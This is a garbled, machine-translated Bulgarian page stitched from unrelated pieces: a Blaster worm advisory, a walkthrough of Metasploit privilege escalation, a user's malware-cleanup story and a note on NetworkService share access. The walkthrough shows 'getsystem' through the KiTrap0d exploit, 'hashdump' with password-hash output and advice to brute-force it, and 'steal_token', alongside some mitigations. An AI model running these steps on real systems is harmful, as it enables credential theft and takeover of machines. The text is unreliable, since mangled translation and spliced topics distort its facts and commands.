Изключването на системата е причинено от nt Authority система. Надолу с потребителското ниво: повишаване на привилегиите до NT AUTHORITYSYSTEM във всяка версия на Windows

ВНИМАНИЕ!!! ВНИМАНИЕ!!! ВНИМАНИЕ!!!
ОПАСЕН ЧЕРВЕЙ!!!

Симптоми:Когато работите в мрежата, внезапно изскача съобщение, което ви информира, че е необходимо да прекратите всички програми, които записват данни, защото... след 60 сек. ще настъпи рестартиране.

Диагноза:Мрежов червей w32.Blaster.worm Червеят използва уязвимост, открита на 16 юли в услугата RPC DCOM, която присъства във всички операционна система Windows семейства 2000, Windows XP и Windows 2003. Тази уязвимост е препълване на буфера, което се причинява от правилно създаден TCP/IP пакет, пристигащ на порт 135, 139 или 445 на атакувания компютър. Позволява най-малко да се извърши DoS атака (DoS означава „Отказ от услуга“ или „отказ от услуга“; в този случай атакуваният компютър се рестартира) и най-много да изпълни произволен код в паметта на атакувания компютър. Когато новият червей се разпространява, той атакува порт 135 и при успех стартира програмата TFTP.exe, чрез която изтегля изпълнимия си файл на атакувания компютър. В този случай на потребителя се дава съобщение за спиране на услугата RPC и след това рестартиране. След рестартиране червеят автоматично се стартира и започва да сканира мрежите, достъпни от компютъра за компютри с отворен порт 135. Ако бъдат открити такива, червеят започва атака и всичко се повтаря отначало. Освен това, съдейки по скоростта на разпространение в момента, червеят скоро ще заеме първо място в списъците на антивирусните компании.

Лекарство:Има три начина да се предпазите от червея. Първо, бюлетинът на Microsoft съдържа връзки към пачове за всички уязвими версии на Windows, които затварят RPC пропуска (тези пачове бяха пуснати на 16 юли, така че тези, които редовно актуализират системата си, не трябва да се притесняват). Второ, ако порт 135 е затворен от защитна стена, червеят няма да може да проникне в компютъра. Трето, деактивирането на DCOM помага като последна мярка (тази процедура е описана подробно в бюлетина на Microsoft). По този начин, ако все още не сте били атакувани от червей, силно се препоръчва да изтеглите корекция за вашата операционна система от сървър на Microsoft възможно най-скоро (например, използвайте услугите на Windows Update) или конфигурирайте блокирането на портове 135, 139 и 445 в защитната стена. Ако вашият компютър вече е заразен (и появата на RPC съобщение за грешка ясно означава, че е заразен), тогава трябва да изключите DCOM (в противен случай всяка следваща атака ще доведе до рестартиране), след което изтеглете и инсталирайте корекцията. За да унищожите червея, трябва да премахнете записа "windows auto update"="msblast.exe" от ключа на системния регистър HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, след което да намерите и изтриете файла msblast.exe - това е тялото на червея. Можете да прочетете повече за процедурата за премахване на червеи на уебсайта на Symantec.

В момента не всички антивируси откриват червея; можете да се надявате на защита от тях само след пускането на актуализации.

Ако все още не сте получили такова съобщение, изтеглете пачове от Uncle Bill:

Ето връзки към лекарства за NT 4.0 и 2000, 2003 Server

Буквално няколко дни преди изданието да бъде отпечатано, Metasploit придоби
нов модул, за който просто нямаше как да не ви разкажем. Благодарение на
нова команда getsystem, на компрометирана система вече е възможно да отидете
от потребителско ниво до ring0, получавайки NT AUTHORITY\SYSTEM права! И това - във всеки
версии на Windows.

На 19 януари 2010 г. уязвимостта от 0 дни стана публична, позволявайки
повишаване на привилегиите по всяко време Windows версии, като се започне от NT 3.1, издаден през
през 1993 г. и завършвайки с новомодните „седем“. На exploit-db.com от хакер Tavis
Ormandy публикува както източниците на експлойта KiTrap0d, така и компилираната версия
двоичен, готов за използване. Всеки може да опита оригиналния експлойт
желаещи. За да направите това, просто трябва да извлечете vdmexploit.dll и vdmallowed.exe от архива,
по някакъв начин го прехвърлете на жертвената машина и стартирайте exe файла там. IN
резултат, независимо кой потребителски акаунт е
при стартиране ще се появи конзола със системни потребителски привилегии, тоест NT
АВТОРИТЕТ\СИСТЕМА. За да проверите, можете да стартирате Sploit на вашата машина,
като преди това сте влезли в системата като обикновен потребител. След стартиране
Sploit ще отвори нов прозорец cmd.exe с максимални привилегии.

Какво дава това? Представете си ситуация, при която експлойт прониква в някакво приложение и
получава черупка отдалечен компютър. Нека това бъде сборна точка за интернет
Explorer - в този случай нападателят ще има достъп до системата с правата
потребителят, под чийто акаунт е стартиран браузърът. Не споря, много
често това ще бъде акаунт с администраторски права (потребителят е виновен), но
ако не? Това е мястото, където можете да използвате KiTrap0d, за да увеличите привилегиите си
към NT AUTHORITY\SYSTEM! Освен това дори тези потребители, които са членове на групата
администратор, няма достъп до определени области на системата, напр.
четене на хешове на потребителски пароли (повече за това по-долу). И системният акаунт на NT -
Може би! С всичко това към момента на публикуване на статията нямаше нито един пач от
Microsoft не е пуснала корекция за уязвимостта.

Превземане на операционната система

Няма да демонстрираме оригиналния експлойт в действие, защото 25
януари беше добавен нов скрипт към Metasploit, благодарение на който можете да използвате
KiTrap0d стана още по-удобен. Опцията, първоначално включена в модулните бази данни, беше
нестабилен и не винаги работеше, но не мина и половин ден, преди да се появят всички грешки
елиминиран. Сега модулът се изтегля заедно с всички други актуализации,
така че за да инсталирате, просто изберете елемента от менюто "Metasploit update".
Сега, като имате достъп до отдалечената система, можете да въведете "run kitrap0d" и да донесете
ще се обедини в действие. „Но тъй като има такова пиянство, нека да приложим този въпрос
специален екип", помислиха разработчиците на Metasploit. В резултат на това
Това е чудесна команда за "повишаване на привилегии", достъпна чрез
meterpreter разширение - много ни харесва :).

И така, имаме достъп до отдалечената система (илюстративен пример
операцията е дадена в статията "Операция Аврора") и ние сме в конзолата
metasploit. Да видим как се справяме с правата:

meterpreter > getuid

да редовен потребител. Може би дори е част от групата
администратори, но това няма значение за нас. Свързваме модула, в който е реализиран
командата getsystem, която ни интересува, и проверете дали се е заредила чрез показване
помощен екран:

meterpreter > използвайте priv
Зареждане на разширението priv... успех.
meterpreter > getsystem -h
Употреба: getsystem
Опитайте се да издигнете привилегията си до тази на локалната система.
НАСТРОИКИ:

H Банер за помощ.
-t Техниката за използване. (По подразбиране е "0").
0: Всички налични техники
1: Услуга - Имитиране на именуван канал (в паметта/администратор)
2: Услуга - Имитиране на именуван канал (Dropper/Admin)
3: Услуга - Дублиране на токени (в паметта/администратор)
4: Експлойт - KiTrap0D (в паметта/потребител)

Както можете да видите, сливането на KiTrap0D реализира само част от функционалността на командата.
Ако сте успели да вземете shell с потребител, който вече има права
администратор, след което да се повиши до нивото NT AUTHORITY\SYSTEM, което можете да използвате
три други техники (клавишът -t ви позволява да изберете тази, от която се нуждаете). Както и да е, без да уточнявам
никакви параметри, ние ще кажем на metasploit какво може да използва
някой от подходите. Включително KiTrap0D, което ще увеличи привилегиите ни до ниво
„Системата“, независимо какви права имаме в момента.

meterpreter > getsystem
...получих система (чрез техника 4).

Да, получихме съобщение за успешно повишаване на привилегиите и за атака
Използван е KiTrap0D - явно е с приоритет. Наистина ли сме
роза в системата? Нека проверим текущия си UID (потребителски идентификатор):

meterpreter > getuid

Яжте! Само една команда в конзолата metasploit и NT AUTHORITY\SYSTEM права
ни в джоба ви. Освен това, общо казано, всичко е възможно. Напомням, нито един
Нямаше корекция от Microsoft по времето, когато списанието беше публикувано.

Изхвърляне на пароли

Тъй като вече имате достъп до системния акаунт, трябва да извлечете от него
нещо полезно. Metasploit има чудесна команда hashdump -
по-разширена версия на добре познатата помощна програма pwdump. Освен това в последното
версията на metasploit включва преработена версия на скрипта, който използва
модернизиран принцип за извличане на LANMAN/NTLM хешове и все още не е открит
антивируси. Но не това е важното. Важно е да изпълните командата hashdump
Необходими са права за NT AUTHORITY\SYSTEM. В противен случай програмата ще изведе грешка
„[-] priv_passwd_get_sam_hashes: Операцията е неуспешна: 87“. Това се случва, защото
че LANMAN/NTLM хешовете на потребителските пароли се съхраняват в специални клонове на регистъра
HKEY_LOCAL_MACHINE\SAM и HKEY_LOCAL_MACHINE\SECURITY, които дори не са достъпни
администратори. Те могат да се четат само с привилегии на системния акаунт.
Най-общо казано, използвайте exploit и след това командата hashdump за
локалното извличане на хеша от системния регистър изобщо не е необходимо. Но ако такива
Възможността е налице, защо не?

meterpreter > getuid
Потребителско име на сървъра: NT AUTHORITY\SYSTEM

meterpreter > стартирайте hashdump
[*] Получаване на ключа за зареждане...
[*] Изчисляване на ключа hboot с помощта на SYSKEY 3ed7 [...]
[*] Получаване на потребителски списък и ключове...
[*] Декриптиране на потребителски ключове...
[*] Изхвърляне на хешове на пароли...

Администратор:500:aad3b435b51404eeaad3b435b51404ee:...
Гост:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...

Хъшовете са получени. Остава само да ги нахраним на някой от брутфорсерите, напр.
l0phtcrack.

Как мога да си върна привилегиите?

Смешна ситуация се случи, когато се опитах да върна правата към нормалното
потребител обратно. Командата rev2self, която открих, не работи и все още
остана "NT AUTHORITY\SYSTEM": очевидно е проектиран да работи с три
други подходи, внедрени в getsystem. Оказа се, че се връща
привилегии, е необходимо да се „открадне“ токена на процеса, стартиран от този потребител,
които ни трябват. Затова показваме всички процеси с командата ps и избираме от тях
подходящо:

meterpreter > пс
Списък с процеси
============
Потребителски път на арка на името на PID
--- ---- ---- ---- ----
0
4 System x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\потребител C:\WINDOWS\Explorer.EXE
...

Както виждаме, explorer.exe се стартира точно под нормалния потребител
сметка и има PID=1560. Сега всъщност можете да „откраднете жетон“, като използвате
команда steal_token. PID му се предава като единствен параметър
необходим процес:

meterpreter > steal_token 1558
Откраднат токен с потребителско име: WINXPSP3\потребител
meterpreter > getuid
Потребителско име на сървъра: WINXPSP3\потребител

Съдейки по полето „Потребителско име на сървъра“, операцията е била успешна.

Как работи?

И накрая, струва си да говорим за естеството на уязвимостта, довела до появата
Sploit. Пробивът в сигурността възниква поради грешка в системния процесор
#GP прекъсва (което се нарича nt!KiTrap). Заради него с привилегии на ядрото
може да се направи произволен код. Това се случва, защото системата
неправилно проверява някои извиквания на BIOS, когато е на 32-битова x86 платформа
работи 16-битово приложение. За да се използва уязвимостта, експлойтът създава
16-битово приложение (%windir%\twunk_16.exe), манипулира някои
структурира системата и извиква функцията NtVdmControl(), за да започне
Виртуална DOS машина на Windows (известна още като подсистема NTVDM), която в резултат на предишна
манипулацията води до извикване на манипулатора на прекъсване на системата #GP и
когато експлойтът се задейства. Между другото, това води до единственото ограничение
експлойт, който работи само на 32-битови системи. В 64-битов
Операционните системи просто нямат емулатор за стартиране на 16-битови приложения.

Защо информация с готов експлойт стана публично достояние? Относно наличността
Авторът на експлойта информира Microsoft за уязвимостта в началото на миналата година и
дори получи потвърждение, че докладът му е приет за разглеждане. Само количка
и сега там. Една година нямаше официален пач от компанията и авторът реши
публикува информация публично, надявайки се, че нещата ще се развият по-бързо. Да видим,
ще бъде ли наличен пачът, докато списанието бъде пуснато в продажба :)?

Как да се предпазите от подвизи

Тъй като все още няма пълна актуализация за разрешаване на уязвимостта,
ще трябва да използвате заобиколни решения. Най-надеждният вариант е
деактивирайте подсистемите MSDOS и WOWEXEC, което незабавно ще лиши експлойта
функционалност, защото вече няма да може да извиква функцията NtVdmControl().
за стартиране на системата NTVDM. В по-старите версии на Windows това става чрез
системния регистър, в който трябва да намерите клона HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW
и добавете някакъв символ към името му. За съвременната ОС
трябва да зададете ограничение за стартиране на 16-битови приложения чрез
групови политики. За да направите това, обадете се на GPEDIT.MSC, след което отидете на секцията
„Потребителска конфигурация/Административни шаблони/Компоненти на Windows/Съвместимост
приложения" и активирайте опцията "Забрана на достъпа до 16-бит
приложения“.

WWW

Описание на уязвимостта от автора на експлойта:

http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html

Заобиколно решение от Microsoft:

http://support.microsoft.com/kb/979682

ВНИМАНИЕ

Информацията е представена с образователна цел. Използвайки го в
за незаконни цели може да доведе до наказателна отговорност.

Наскоро, по-точно преди седмица, хванах червей, а това никога не се е случвало през цялото ми правене на чай! Нощно време е - не можете да се обадите на техник, а парите са само на картата - 200 рубли в джоба Какво да правя, отчаяно се нуждая от компютър!

През телефона влизам в търсачките и въвеждам името, написано в заглавието на темата - майка ми, какво да разбера - това същество живее в интернет от 1993 г. и Microsoft Corporation знае за него, създателят ги информира специално. Днес, когато този червей влезе във вашия компютър, той придобива администраторски права и е в състояние да извършва всякакви трикове.

След като проучих няколко десетки форума, прочетох стотици съвети на ден, без да знам как да спя, се качвам в дълбините на системата си и с треперещи ръце започвам да отварям папките и файловете, за които съм чел. упоритост на гладен вълк, търся причината, но... Твърде съм неопитен за това. Отново през телефона влизам в нашия сайт и пиша на един от нашите модератори... Проблемът е много труден и за да не ме мъчи човекът ме съветва да разваля системата и да сложа нова, но аз никога не съм го правил! Той ми казва по телефона (без да пести средства за междуградски разговори) как да го направя стъпка по стъпка, а аз седя и си го записвам. След това той чака резултата, а аз седя и разбирам, че много съжалявам за натрупаната информация... и вземам решение, ако го съборя, винаги ще имам време, но сега ще се боря на моя собствен.

Във всеки случай знаех, че нашите гурута са до мен и ще ме посъветват какво да правя и как. Междувременно, на моя отговорност и риск, правя следното:

1) Банерът изключва компютъра, за да се рестартира след 60 секунди - това означава, че това време трябва да се увеличи и по съвет на един член на форума аз Успявам да върна часовника една година назад!

2) Вече спокойно и бавно преглеждам целия регистър и програмите чрез AnvirTaskManager - той беше единственият, който попита за външния вид нова програма, но като издънка го оставих да мине.

3) без да разбирам нищо там, стартирам пълно сканиране AVAST, като преди това сте инсталирали всички разширения в настройките.

след 3,5 часа ми даде 6 заразени файла - ето ги

win32 malware-gen (2 броя)

Fakeinst-T (2 бр.)

Просто премахвам тези вредители, без дори да се опитвам да ги лекувам.

4) След това отивам в Revo Unystailer и изтривам всичко, което инсталирах през последните няколко дни, заедно с AnvirTaskManager и Reg Organizier.

5) Зареждам AVZ и го стартирам.

И тук възниква проблем - диска ми е разделен на две C и N. C сканира нормално и не намира нищо, щом започне да сканира N целия компютър изпада в ступор. Рестартирам - банерът вече не изскача и се успокоявам, интернет работи, но mozilla не се отваря, минавам през Google Chrome.

Проверявам N в онлайн режим. Чисто! Отварям N, опитвам се да избера папка - пак компютъра замръзва! След няколко опита да го отворя, сканирам го отново с AVAST и като не намирам нищо, решавам да копирам всичко в C.

След копиране в C изчиствам всички N и влизам в копието - всичко работи!!!

Преди час изтеглих и актуализирах Mozilla и сега се наслаждавам на живота. Проверих всичко и сега ще актуализирам Dr. W curellt и ще го сложа за една нощ - само за да успокоя съвестта си! Така че имайте предвид, скъпи колеги, не всичко е толкова страшно. За безопасността на вашите компютри, направете както е посочено в прикачения файл!!!

Да са ни здрави компютрите!!!

С уважение към всички читатели Алексей!

Като част от един от проектите трябваше да конфигурирам приложение, което трябваше да работи архивиранебази данни на отдалечен MS SQL сървър към файлово хранилище на друг сървър. Влизам отдалечено съхранениеизползва се акаунтът, под който работи MS SQL. В нашия случай MS SQL беше стартиран под локален акаунт Мрежова услуга(NT AUTHORITY\NetworkService). Естествено, този локален акаунт няма никакви права върху отдалечения дял. Възможно е, разбира се, да превключите MS SQL да работи под акаунт на домейн (или), но можете да конфигурирате отдалечен достъпкъм споделянето и под NT AUTHORITY\NetworkService.

Как да разрешите достъп до други компютри под акаунта на NetworkService

Ако трябва да предоставите достъп до няколко компютъра, най-лесният начин е да ги комбинирате в една група и да предоставите достъп до групата. Създайте нова група в AD и добавете към нея всички компютърни акаунти, които трябва да имат достъп до мрежовия ресурс с права за мрежови услуги. В свойствата на папката дайте необходимите разрешения на групата.

Какво ще кажете за други местни акаунти?

При предоставяне на достъп до ресурс чрез сметкакомпютър, предоставен ли е достъп до всички други локални акаунти? Не – достъпът ще бъде наличен само за акаунти СистемаИ Мрежова услуга. Всички локални акаунти, на които трябва да бъде разрешен достъп до мрежов ресурс, ще трябва да получат достъп индивидуално.